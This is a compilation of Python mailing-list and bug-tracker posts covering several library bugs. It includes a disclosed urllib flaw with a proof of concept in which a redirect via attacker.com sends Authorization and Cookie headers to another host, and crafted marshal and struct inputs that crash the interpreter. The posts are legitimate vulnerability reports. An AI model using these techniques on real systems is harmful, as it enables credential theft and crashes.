[Python-announce] pytest-when 1.0.3
Hi all, happy to announce a better developer experience with pytest-when fixture. With pytest-mock you can define the complex mocking behavior via natural interface: ``` when(some_object, "attribute").called_with(1, 2).then_return("mocked") ``` In this case the some_object.attribute(1, 2) == "mocked". But if it will be called with any other arguments, it will return what it is suppose to return. Project GitHub: https://github.com/zhukovgreen/pytest-when zhukovgreen/pytest-when: Pytest plugin for more readable mocking github.com Support python>=3.8 and tested until 3.11 Small example from the docs: # class which we're going to mock in the test class Klass1: def some_method( self, arg1: str, arg2: int, *, kwarg1: str, kwarg2: str, ) -> str: return "Not mocked" def test_should_properly_patch_calls(when): when(Klass1, "some_method").called_with( "a", when.markers.any, kwarg1="b", kwarg2=when.markers.any, ).then_return("Mocked") assert ( Klass1().some_method( "a", 1, kwarg1="b", kwarg2="c", ) == "Mocked" ) assert ( Klass1().some_method( "not mocked param", 1, kwarg1="b", kwarg2="c", ) == "Not mocked" ) # if you need to patch a function def test_patch_a_function(when): when(example_module, "some_normal_function").called_with( "a", when.markers.any, kwarg1="b", kwarg2=when.markers.any, ).then_return("Mocked") assert ( example_module.some_normal_function( "a", 1, kwarg1="b", kwarg2="c", ) == "Mocked" ) assert ( example_module.some_normal_function( "not mocked param", 1, kwarg1="b", kwarg2="c", ) == "Not mocked" ) Thank you for any feedback -- zhukovgreen, Data Engineer @Paylocity https://github.com/zhukovgreen ___ Python-announce-list mailing list -- python-announce-list@python.org To unsubscribe send an email to python-announce-list-le...@python.org https://mail.python.org/mailman3/lists/python-announce-list.python.org/ Member address: arch...@mail-archive.com
[issue39758] StreamWriter.wait_closed() can hang indefinitely.
Artem added the comment: See this issue on 3.9.6 No SSL, but plain sockets. This seems to appear when writer.write/writer.drain was cancelled, and writer.close/writer.wait_closed called after this. -- nosy: +aeros, seer versions: +Python 3.9 ___ Python tracker <https://bugs.python.org/issue39758> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue38856] asyncio ProactorEventLoop: wait_closed() can raise ConnectionResetError
Artem added the comment: Python 3.9.6 Linux same issue. -- nosy: +seer versions: +Python 3.9 ___ Python tracker <https://bugs.python.org/issue38856> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue44697] Memory leak when asyncio.open_connection raise
Artem added the comment: Checked on 3.9.6 - still leaking. Strange stuff, but if I write except OSError as e: del self instead of except OSError as e: pass leak is disappearing. -- versions: +Python 3.9 -Python 3.6 ___ Python tracker <https://bugs.python.org/issue44697> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue44697] Memory leak when asyncio.open_connection raise
Change by Artem : -- nosy: +bquinlan ___ Python tracker <https://bugs.python.org/issue44697> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue44697] Memory leak when asyncio.open_connection raise
New submission from Artem : I write some short example. import resource import asyncio class B: def __init__(self, loop): self.loop = loop self.some_big_data = bytearray(1024 * 1024) # 1Mb for memory bloating async def doStuff(self): if not await self.connect(): return print('Stuff done') async def connect(self) -> bool: try: _, writer = await asyncio.open_connection('127.0.0.1', 12345, loop=self.loop) writer.close() return True except OSError as e: pass return False class A: def __init__(self, loop): self.loop = loop async def doBStuff(self): b = B(self.loop) await b.doStuff() async def work(self): print('Working...') for _ in range(1000): await self.loop.create_task(self.doBStuff()) print('Done.') print( 'Memory usage {}kb'.format( resource.getrusage( resource.RUSAGE_SELF).ru_maxrss)) async def amain(loop): a = A(loop) await a.work() if __name__ == "__main__": loop = asyncio.get_event_loop() loop.run_until_complete(amain(loop)) 100 cycles "Memory usage 41980kb" 1000 cycles "Memory usage 55412kb" 1 cycles "Memory usage 82880kb" And so on... Does anyone know workaround? -- components: asyncio messages: 397945 nosy: aeros, asvetlov, seer, yselivanov priority: normal severity: normal status: open title: Memory leak when asyncio.open_connection raise type: resource usage versions: Python 3.6 ___ Python tracker <https://bugs.python.org/issue44697> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
Re: Correct traceback for multiline chain of method calling
> That line is already there: ># File "/home/komendart/temp/script.py", line 6, in fail ># raise RuntimeError('fail') Probably I should rewrite more concretely. I have such traceback ending for python3.7 # File "script.py", line 15, in main # .fail(True) # File "script.py", line 6, in fail # raise RuntimeError('fail') It has the exact line of the failing method's call (line 15) and that is what I want for fresh python in general. Just the name of the method and place inside of it with error in the last part of traceback is not enough because this method can occur in the chain several times (like .fail in my simple example) and I want to get a line of the exact call. > Annoying, but it would provide the desired precision. I agree with all parts of this sentence :) Well, I can live with such a solution but it is really uncomfortable. In python3.7 and lower (even in python2, lol) if a method was called with some arguments traceback had a line corresponding to some argument of needed call. This behaviour was suitable for me. I can a bit formalize my suggestion to improve python tracebacks. If we have code in one line like ( (some complex construction of object with __call__) ( some arguments ) ) traceback should contain a line with opening brace before arguments (Now in the last python traceback seems to contain the start of the called object's construction) The last line of called object's construction or first of arguments enumerating is ok too, it doesn't really matter for me. BTW it is not important for me but I can dream how this proposal can be generalized. For example for failing index operations a[b] (error line must be close to [ here) or for all binary operations (a + b fails => the error line must be close to the line with plus operator). Does it sound reasonable? Am I on the right mailing list for python improvement suggestions? :) -- Best wishes, Artem Komendantian komendantyan.ar...@gmail.com сб, 10 июл. 2021 г. в 02:53, Cameron Simpson : > On 09Jul2021 18:29, Артем Комендантян > wrote: > >There is a code https://pastebin.com/0NLsHuLa. > >It has a multiline chain of method calling, when some method fails. In > >python3.7 it fails in a row which corresponds to the failing method, in > >python3.9 it corresponds to the very first line. > > > >Another similar example is https://pastebin.com/2P9snnMn > >The error is on the first line for older pythons too. > > Interesting. > > There was some work done in recent Pythons to improve syntax error > reporting. I wonder if it has had side effects on the reporting. > > >I propose to have a line with the method name in traceback if this > >method > >fails. > > That line is already there: > > # File "/home/komendart/temp/script.py", line 6, in fail > # raise RuntimeError('fail') > > See that it points at the fail() method from line 6 of the script? > > >I develop some library when it is very popular among users to declare some > >operations with such multiline chains. Also I want to keep correct > >traceback for each operation because the first line is not very > informative > >when some method occurred more than once in this chain. > > > >Can this improvement be done? Maybe anybody has any other suggestions on > >how to get the correct line in traceback right now? > > Aside from putting the whole thing on 1 line? Joking. > > Possibly only by breaking it up purely while debugging: > > x = a.do_nothing() > x = x.do_nothing() > x = x.fail(True) > > and so forth. Annoying, but it would providethe desired precision. > > Cheers, > Cameron Simpson > -- > https://mail.python.org/mailman/listinfo/python-list > -- https://mail.python.org/mailman/listinfo/python-list
[issue41316] tarfile: Do not write full path in FNAME field
Artem Bulgakov added the comment: Hi. My PR doesn't remove the possibility to add tree into tar file. It only fixes header for GZIP compression. Any data after this header is not affected. You can test it by creating two archives with the same data but one with my patch and the second without. All bytes after header are equal. -- ___ Python tracker <https://bugs.python.org/issue41316> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41316] tarfile: Do not write full path in FNAME field
Change by Artem Bulgakov : -- keywords: +patch pull_requests: +20646 stage: -> patch review pull_request: https://github.com/python/cpython/pull/21511 ___ Python tracker <https://bugs.python.org/issue41316> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41316] tarfile: Do not write full path in FNAME field
New submission from Artem Bulgakov : tarfile sets FNAME field to the path given by user: Lib/tarfile.py:424 It writes full path instead of just basename if user specified absolute path. Some archive viewer apps like 7-Zip may process file incorrectly. Also it creates security issue because anyone can know structure of directories on system and know username or other personal information. You can reproduce this by running below lines in Python interpreter. Tested on Windows and Linux. Python 3.8.2 (default, Apr 27 2020, 15:53:34) [GCC 9.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import os >>> import tarfile >>> open("somefile.txt", "w").write("sometext") 8 >>> tar = tarfile.open("/home/bulgakovas/file.tar.gz", "w|gz") >>> tar.add("somefile.txt") >>> tar.close() >>> open("file.tar.gz", "rb").read()[:50] b'\x1f\x8b\x08\x08cE\x10_\x02\xff/home/bulgakovas/file.tar\x00\xed\xd3M\n\xc20\x10\x86\xe1\xac=EO\x90' You can see full path to file.tar (/home/bulgakovas/file.tar) as FNAME field. If you will write just tarfile.open("file.tar.gz", "w|gz"), FNAME will be equal to file.tar. RFC1952 says about FNAME: This is the original name of the file being compressed, with any directory components removed. So tarfile must remove directory names from FNAME and write only basename of file. -- components: Library (Lib) messages: 373759 nosy: ArtemSBulgakov, lars.gustaebel priority: normal severity: normal status: open title: tarfile: Do not write full path in FNAME field type: behavior versions: Python 3.10, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9 ___ Python tracker <https://bugs.python.org/issue41316> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment: Thx, after upgrade to: Python 3.8.1rc1 (tags/v3.8.1rc1:b00a2b5, Dec 10 2019, 01:13:53) [MSC v.1916 64 bit (AMD64)] on win32 All works fine, ...but Could you "pushing the person" which responsible for Web-Site please?, because I got Interpreter from there: https://www.python.org/downloads/release/python-380/ Without any Warnings or Recommendation for using 3.8.1rc1 Is it normal? -- ___ Python tracker <https://bugs.python.org/issue39013> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment: Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> while False: ... if False: ... break ... File "", line 3 SyntaxError: 'break' outside loop -- ___ Python tracker <https://bugs.python.org/issue39013> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue39013] SyntaxError: 'break' outside loop for legal Expression
Artem Tepanov added the comment: Using cmd: C:\Users\ATepanov>python -V Python 3.8.0 C:\Users\ATepanov>python C:\Users\ATepanov\Desktop\Outside_The_Loop.py File "C:\Users\ATepanov\Desktop\Outside_The_Loop.py", line 3 break ^ SyntaxError: 'break' outside loop In Interactive: Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> while False: ... break ... File "", line 2 SyntaxError: 'break' outside loop >>> -- ___ Python tracker <https://bugs.python.org/issue39013> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue39013] SyntaxError: 'break' outside loop for legal Expression
New submission from Artem Tepanov : Why I can't execute this code: while False: if False: break print('WTF?') When I use repl.it or PyCharm on my work (Python 3.7) all works fine, yes I know this code looks silly, but it is a legal expression. About CPython Interpreter: C:\WINDOWS\system32>python Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. -- messages: 358175 nosy: Artem Tepanov priority: normal severity: normal status: open title: SyntaxError: 'break' outside loop for legal Expression type: compile error versions: Python 3.8 ___ Python tracker <https://bugs.python.org/issue39013> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
Change by Artem Khramov : -- components: +FreeBSD, IO, Library (Lib), macOS nosy: +ned.deily, ronaldoussoren ___ Python tracker <https://bugs.python.org/issue37811> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
Change by Artem Khramov : -- keywords: +patch pull_requests: +14931 stage: -> patch review pull_request: https://github.com/python/cpython/pull/15202 ___ Python tracker <https://bugs.python.org/issue37811> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue37811] [FreeBSD, OSX] Socket module: incorrect usage of poll(2)
New submission from Artem Khramov : FreeBSD implementation of poll(2) restricts timeout argument to be either zero, or positive, or equal to INFTIM (-1). Unless otherwise overridden, socket timeout defaults to -1. This value is then converted to milliseconds (-1000) and used as argument to the poll syscall. poll returns EINVAL (22), and the connection fails. I have discovered this bug during the EINTR handling testing, and have naturally found a repro code in https://bugs.python.org/issue23618 (see connect_eintr.py, attached). On GNU/Linux, the example runs as expected. -- files: connect_eintr.py messages: 349356 nosy: akhramov priority: normal severity: normal status: open title: [FreeBSD, OSX] Socket module: incorrect usage of poll(2) versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9 Added file: https://bugs.python.org/file48537/connect_eintr.py ___ Python tracker <https://bugs.python.org/issue37811> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue34386] Expose a dictionary of interned strings in sys module
Artem Golubin added the comment: Thank you, I agree. I can't come up with practical use cases other than my curiosity. Is it possible to somehow expose the dictionary in the debug build of Python? Currently, there is no way to access it from the interpreter even with ctypes. -- ___ Python tracker <https://bugs.python.org/issue34386> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue34386] Expose a dictionary of interned strings in sys module
New submission from Artem Golubin : Python provides an ability to intern strings (sys.intern). It would be useful to expose a read-only dictionary of interned strings to the Python users so we can see what kind of strings are interned. It takes minimal changes since internally it's just a dictionary. Is this worth adding to the sys module? -- components: Interpreter Core messages: 323437 nosy: rushter priority: normal severity: normal status: open title: Expose a dictionary of interned strings in sys module type: enhancement versions: Python 3.8 ___ Python tracker <https://bugs.python.org/issue34386> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov added the comment: If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly discuss that all headers should be sent. I wish it did :) I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure). Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it https://tools.ietf.org/html/rfc6265#section-5.4 curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't sent either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :) -- ___ Python tracker <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov <artem.smotra...@gmail.com> added the comment: Hi Ivan, Yes, unfortunately specs don't say anything about this scenario. > once you have given your credentials to a server, it is free to do whatever > it wants with them. I hope servers don't share this opinion :) > So, your proposed filtering does not actually achieve anything meaningful.1 I am sorry that I couldn't convice you. Thank you for your reply! -- ___ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
New submission from Artem Smotrakov <artem.smotra...@gmail.com>: After discussing it on secur...@python.org, it was decided to disclose it. Here is the original report: Hello Python Security Team, Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects. Let's consider the following environment: - http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme - http://httpleak.gypsyengineer.com/redirect.php?url= is an open redirect which returns 301 code, and redirects a client to the specified URL - http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent Let's then consider the following scenario: - create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com' - call urllib.request.Request.add_header() method to set Authorization and Cookie headers - call urllib.request.urlopen() method to open a connection Here is what happens next: - urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected - redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains) - urllib processes 301 code and makes a request to http://headers.gypsyengineer.com The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well. Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. As a result, the attacker can imporsonate the user on the original web site. Here is a simple POC which shows the problem: import urllib.request req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com') req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==') req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com'); with urllib.request.urlopen(req) as f: print(f.read(2048).decode("utf-8")) Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers which are supposed to be sent only to httpleak.gypsyengineer.com: Hello, I am headers.gypsyengineer.com Here are HTTP headers you just sent me: Accept-Encoding: identity User-Agent: Python-urllib/3.8 Authorization: Basic YWRtaW46dGVzdA== Cookie: This is only for httpleak.gypsyengineer.com Host: headers.gypsyengineer.com Cache-Control: max-age=259200 Connection: keep-alive I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects. Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks! Artem -- components: Library (Lib) messages: 317793 nosy: alex, artem.smotrakov priority: normal severity: normal status: open title: urllib may leak sensitive HTTP headers to a third-party web site type: security versions: Python 3.5 ___ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
Changes by Artem Smotrakov <artem.smotra...@gmail.com>: -- keywords: +patch Added file: http://bugs.python.org/file46723/_struct_cache.patch ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29802> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
New submission from Artem Smotrakov: Attached struct_unpack_crash.py results to a null-pointer dereference in s_unpack_internal() function of _struct module: ASAN:SIGSEGV = ==20245==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x7facd2cea83a bp 0x sp 0x7ffd0250f860 T0) #0 0x7facd2cea839 in s_unpack_internal /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 #1 0x7facd2ceab69 in Struct_unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1570 #2 0x7facd2ceab69 in unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:2192 #3 0x7facd2ceab69 in unpack /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:215 #4 0x474397 in _PyMethodDef_RawFastCallKeywords Objects/call.c:618 #5 0x474397 in _PyCFunction_FastCallKeywords Objects/call.c:690 #6 0x42685f in call_function Python/ceval.c:4817 #7 0x42685f in _PyEval_EvalFrameDefault Python/ceval.c:3298 #8 0x54b164 in PyEval_EvalFrameEx Python/ceval.c:663 #9 0x54b164 in _PyEval_EvalCodeWithName Python/ceval.c:4173 #10 0x54b252 in PyEval_EvalCodeEx Python/ceval.c:4200 #11 0x54b252 in PyEval_EvalCode Python/ceval.c:640 #12 0x431e0e in run_mod Python/pythonrun.c:976 #13 0x431e0e in PyRun_FileExFlags Python/pythonrun.c:929 #14 0x43203b in PyRun_SimpleFileExFlags Python/pythonrun.c:392 #15 0x446354 in run_file Modules/main.c:338 #16 0x446354 in Py_Main Modules/main.c:809 #17 0x41df71 in main Programs/python.c:69 #18 0x7facd58ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x428728 in _start (/home/artem/projects/python/build/cpython-asan/bin/python3.7+0x428728) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 s_unpack_internal ==20245==ABORTING Looks like _struct implementation assumes that PyStructObject->s_codes cannot be null, but it may happen if a bytearray was passed to unpack(). PyStructObject->s_codes becomes null in a couple of places in _struct.c, but that's not the case. unpack() calls _PyArg_ParseStack() with cache_struct_converter() which maintains a cache. Even if unpack() was called incorrectly with a string as second parameter (see below), this value is going to be cached anyway. Next time, if the same format string is used, the value is going to be retrieved from the cache. But PyStructObject->s_codes is still not null in cache_struct_converter() function. If you watch "s_object" under gdb, you can see that "s_codes" becomes null here: PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647 647 view->format = NULL; (gdb) bt #0 PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647 #1 0x0046020c in bytearray_getbuffer (obj=0x77e50730, view=, flags=) at Objects/bytearrayobject.c:72 #2 0x00560b0a in getbuffer (errmsg=, view=0x7fffd700, arg=0x77e50730) at Python/getargs.c:1380 #3 convertsimple (freelist=0x7fffd3b0, bufsize=256, msgbuf=0x7fffd4c0 "must be bytes-like object, not str", flags=2, p_va=0x0, p_format=, arg=0x77e50730) at Python/getargs.c:938 #4 convertitem (arg=0x77e50730, p_format=p_format@entry=0x7fffd3a8, p_va=p_va@entry=0x7fffd610, flags=flags@entry=2, levels=levels@entry=0x7fffd3c0, msgbuf=msgbuf@entry=0x7fffd4c0 "must be bytes-like object, not str", bufsize=256, freelist=0x7fffd3b0) at Python/getargs.c:596 #5 0x00561d6f in vgetargs1_impl (compat_args=compat_args@entry=0x0, stack=stack@entry=0x6164b520, nargs=2, format=format@entry=0x735d5c88 "O*:unpack", p_va=p_va@entry=0x7fffd610, flags=flags@entry=2) at Python/getargs.c:388 #6 0x005639b0 in _PyArg_ParseStack_SizeT ( args=args@entry=0x6164b520, nargs=, format=format@entry=0x735d5c88 "O*:unpack") at Python/getargs.c:163 #7 0x735d2df8 in unpack (module=module@entry=0x77e523b8, args=args@entry=0x6164b520, nargs=, kwnames=kwnames@entry=0x0) at /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:207 #8 0x00474398 in _PyMethodDef_RawFastCallKeywords (kwnames=0x0, nargs=140737352377272, args=0x6164b520, self=0x77e523b8, method=0x737d94e0 <module_functions+160>) at Objects/call.c:618 #9 _PyCFunction_FastCallKeywords (func=func@entry=0x77e53828, args=args@entry=0x6164b520, nargs=nargs@entry=2, kwnames=kwnames@en
[issue29598] Write unit tests for pdb module
New submission from Artem Muterko: I want to write unit tests for pdb module of stdlib. Should I create one pull request for entire module or should I split work into several pull requests? -- ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29598> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue29598] Write unit tests for pdb module
Changes by Artem Muterko <arti...@gmail.com>: -- components: Tests nosy: Artem Muterko priority: normal severity: normal status: open title: Write unit tests for pdb module versions: Python 3.7 ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29598> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue27826] Null-pointer dereference in tuplehash() function
Changes by Artem Smotrakov <artem.smotra...@gmail.com>: -- keywords: +patch Added file: http://bugs.python.org/file44184/tuplehash.patch ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue27826> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue27826] Null-pointer dereference in tuplehash() function
New submission from Artem Smotrakov: A null-pointer dereference may happen while deserialization incorrect data with marshal.loads() function. Here is a test which reproduces this (see also attached marshal_tuplehash_null_dereference.py): import marshal value = ( # tuple1 "this is a string", #string1 [ 1, # int1 2, # int2 3, # int3 4 # int4 ], ( #tuple2 "more tuples", #string2 1.0,# float1 2.3,# float2 4.5 # float3 ), "this is yet another string" ) dump = marshal.dumps(value) data = bytearray(dump) data[10] = 40 data[4] = 16 data[103] = 143 data[97] = 245 data[78] = 114 data[35] = 188 marshal.loads(bytes(data)) This code modifies the serialized data with the following: - update type of 'int2' element to TYPE_SET, 'int3' element becomes a length of the set - update 'float3' element to TYPE_REF which points to tuple1 Here is a stack trace reported by ASan: ASAN:SIGSEGV = ==20296==ERROR: AddressSanitizer: SEGV on unknown address 0x0008 (pc 0x00582064 bp 0x7ffc9e581310 sp 0x7ffc9e5812f0 T0) #0 0x582063 in PyObject_Hash Objects/object.c:769 #1 0x5a3662 in tuplehash Objects/tupleobject.c:358 #2 0x5820ae in PyObject_Hash Objects/object.c:771 #3 0x5a3662 in tuplehash Objects/tupleobject.c:358 #4 0x5820ae in PyObject_Hash Objects/object.c:771 #5 0x58fac8 in set_add_key Objects/setobject.c:422 #6 0x59a85c in PySet_Add Objects/setobject.c:2323 #7 0x760d9d in r_object Python/marshal.c:1310 #8 0x76029d in r_object Python/marshal.c:1223 #9 0x760015 in r_object Python/marshal.c:1195 #10 0x7621dc in read_object Python/marshal.c:1465 #11 0x7639be in marshal_loads Python/marshal.c:1767 #12 0x577ff3 in PyCFunction_Call Objects/methodobject.c:109 #13 0x708a05 in call_function Python/ceval.c:4744 #14 0x6fb5a7 in PyEval_EvalFrameEx Python/ceval.c:3256 #15 0x70276f in _PyEval_EvalCodeWithName Python/ceval.c:4050 #16 0x70299f in PyEval_EvalCodeEx Python/ceval.c:4071 #17 0x6e07d7 in PyEval_EvalCode Python/ceval.c:778 #18 0x432354 in run_mod Python/pythonrun.c:980 #19 0x431e5b in PyRun_FileExFlags Python/pythonrun.c:933 #20 0x42e929 in PyRun_SimpleFileExFlags Python/pythonrun.c:396 #21 0x42caba in PyRun_AnyFileExFlags Python/pythonrun.c:80 #22 0x45f995 in run_file Modules/main.c:319 #23 0x4619c8 in Py_Main Modules/main.c:777 #24 0x41d258 in main Programs/python.c:69 #25 0x7f374629babf in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20abf) #26 0x41ce28 in _start AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV Objects/object.c:769 PyObject_Hash ==20296==ABORTING What happens when it tries to read int2 element: - int2 element is now a set of length 3 - add int4 element to the set - add tuple2 element -- when it adds an element to a set, it calculates a hash of the element -- when it calculates a hash of a tuple, it calculates hashes of all elements of the tuple -- while calculating a hash of tuple2, it calculates a hash of tuple1 since #float3 now is a TYPE_REF which points to tuple1 -- but tuple1 is not complete yet: length of tuple1 is 4, but only string1 was added to it -- tuplehash() function reads a length of a tuple, and then calls PyObject_Hash() for each element -- but it doesn't check if all elements were added to the tuple -- as a result, a null-pointer dereference happens in tuplehash() while reading second element of tuple1 https://hg.python.org/cpython/file/tip/Objects/tupleobject.c#l347 ... static Py_hash_t tuplehash(PyTupleObject *v) { Py_uhash_t x; /* Unsigned for defined overflow behavior. */ Py_hash_t y; Py_ssize_t len = Py_SIZE(v);<= for tuple1 it returns 4, but tuple1 contains only one element (string1) PyObject **p; Py_uhash_t mult = _PyHASH_MULTIPLIER; x = 0x345678UL; p = v->ob_item; while (--len >= 0) { y = PyObject_Hash(*p++);<= null-pointer dereference happens here while reading second element ... I could reproduce it with python3.5, and latest build of https://hg.python.org/cpython (Aug 20th, 2016). Here is a simple patch which updates tuplehash() to check "p" for null: diff -r 6e6aa2054824 Objects/tupleobject.c --- a/Objects/tupleobject.c Sat Aug 20 21:22:03 2016 +0300 +++ b/Objects/tupleobject.c Sat Aug 20 23:17:16 2016 -0700 @@ -355,7 +355,13 @@ x = 0x345678UL; p = v->ob_item; while (--len >= 0) { -y = PyObject_Hash(*p++); +PyObject *next = *p++; +if (next == NULL) { +PyErr_SetString(PyExc_TypeError, +"Cannot compute a hash, tuple seems to be invalid"); +return -1; +} +y = PyObject_Hash(next); if (y == -1) return -1;
[issue21613] Installer for mac doesn't store the installation location
New submission from Artem Ustinov: I'm trying to automate the Python uninstallation on mac but I've found that the actual installation location is not stored for Python packages. That location is required since the pkgutil keeps track of installed files (if you run $ pkgutil --files org.python.Python.PythonFramework-3.4) but doesn't store the absolute paths for that files. 1. Run $ pkgutil --pkgs=.*Python.*3\.4 Here's the expected output org.python.Python.PythonApplications-3.4 org.python.Python.PythonDocumentation-3.4 org.python.Python.PythonFramework-3.4 org.python.Python.PythonInstallPip-3.4 org.python.Python.PythonProfileChanges-3.4 org.python.Python.PythonUnixTools-3.4 2. Run $ pkgutil --pkg-info org.python.Python.PythonFramework-3.4 Here's the output package-id: org.python.Python.PythonFramework-3.4 version: 3.4.1 volume: / location: (null) install-time: 1401373546 Actual Result: The location property is (null) Expected Result: The location property should be '/Library/Frameworks/Python.framework' -- assignee: ronaldoussoren components: Installation, Macintosh messages: 219393 nosy: ronaldoussoren, ustinov priority: normal severity: normal 